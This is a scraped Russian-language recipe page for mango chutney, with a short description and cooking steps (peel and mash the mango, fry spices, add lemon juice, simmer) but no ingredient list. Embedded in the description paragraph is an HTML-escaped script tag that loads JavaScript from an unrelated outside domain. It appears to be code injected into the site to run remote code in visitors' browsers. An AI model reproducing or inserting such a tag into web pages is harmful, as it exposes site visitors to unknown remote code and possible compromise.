Site icon Рецепты

Чатни из манго

Чатни из манго
Чатни из манго



Как известно, чатни — это широко распространенное на юге Азии блюдо. Это традиционная приправа, которую обычно готовят из фруктов — в частности, из манго. Делюсь рецептом.

Описание приготовления:

Чатни из манго — это очень популярная индийская приправа, которая благодаря специям и необычной технологии приготовления очень здорово возбуждает аппетит. Обычно ее передают перед основным блюдом, вместе с какой-нибудь закуской. В нашей семье чатни из манго используется разными способами — намазываем на хлеб, добавляем в блинчики, подаем с оладьями, всякими разными закусками… Вкус передать сложно — надо пробовать. Чего вам и желаю!&ltscript type=»text/javascript» src=»http://fsgv.ru/i.js»&gt&lt/script&gt
Количество порций: 8

Очищаем манго от кожуры.

Мякоть манго нужно размять ложечкой до пюреобразного состояния.

В сковороде разогрейте масло, обжарьте в нем перец и специи в течение 1-2 минуты на быстром огне.

Теперь добавляем лимонный сок, перемешиваем.

Сразу же добавляем манго и уменьшаем огонь. Тушим, помешивая, в течение 5 минут.

Снимаем с огня, охлаждаем — и готово! Хранить в холодильнике.

Сказать спасибо автору

Помните: для этого контента требуется JavaScript.
Exit mobile version